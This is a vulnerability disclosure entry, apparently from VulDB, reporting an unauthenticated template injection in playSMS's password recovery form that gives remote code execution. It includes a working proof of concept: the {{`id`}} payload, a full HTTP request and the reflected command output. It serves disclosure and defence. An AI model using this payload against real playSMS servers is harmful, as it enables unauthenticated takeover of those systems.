| Title | playSMS 1.4.3 Improper Handling of Parameters |
|---|
| Description | playSMS 1.4.3 has an unauthenticated Server-Side Template Injection (SSTI) in the "Recover password" function. The value of the "username" argument is passed through the template handler and evaluated, which leads to unauthenticated remote code execution (RCE): PHP runs the text between backticks as a shell command, and the command output is reflected back into the form field.
Path: the file /playsms/index.php?app=main&inc=core_auth&route=forgot&op=forgot of the component Template Handler
1. On the login page, click "Recover password": http://192.168.10.5/playsms/index.php?app=main&inc=core_auth&route=forgot
2. Enter the payload {{`id`}} in the "username" field and click Submit.
# Burp request (the CSRF token is sent as an ordinary form parameter named X-CSRF-Token; the session cookie is the one issued on the first visit, no login is required)
```http
POST /playsms/index.php?app=main&inc=core_auth&route=forgot&op=forgot HTTP/1.1
Host: 192.168.10.5
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
Origin: http://192.168.10.5
Connection: close
Referer: http://192.168.10.5/playsms/index.php?app=main&inc=core_auth&route=forgot
Cookie: PHPSESSID=49ft51qqg1nhpmve0496kdbsg3
Upgrade-Insecure-Requests: 1

X-CSRF-Token=117bd5b3b1b4eea8759e43b40877f492&username=%7B%7B%60id%60%7D%7D&email=&captcha=
```
# Response from RCE (the output of `id` appears in the value attribute of the reflected username field)
```html
<td><input type=text class=form-control placeholder="Username" name=username value='uid=33(www-data) gid=33(www-data) groups=33(www-data)' maxlength=100></td>
```
|
|---|
| User | Dhimitri (UID 45045) |
|---|
| Submission | 09/11/2024 03:45 (2 years ago) |
|---|
| Moderation | 09/15/2024 18:36 (5 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 277524 [playSMS 1.4.4/1.4.5/1.4.6/1.4.7 Template username/email/captcha code injection] |
|---|
| Points | 17 |
|---|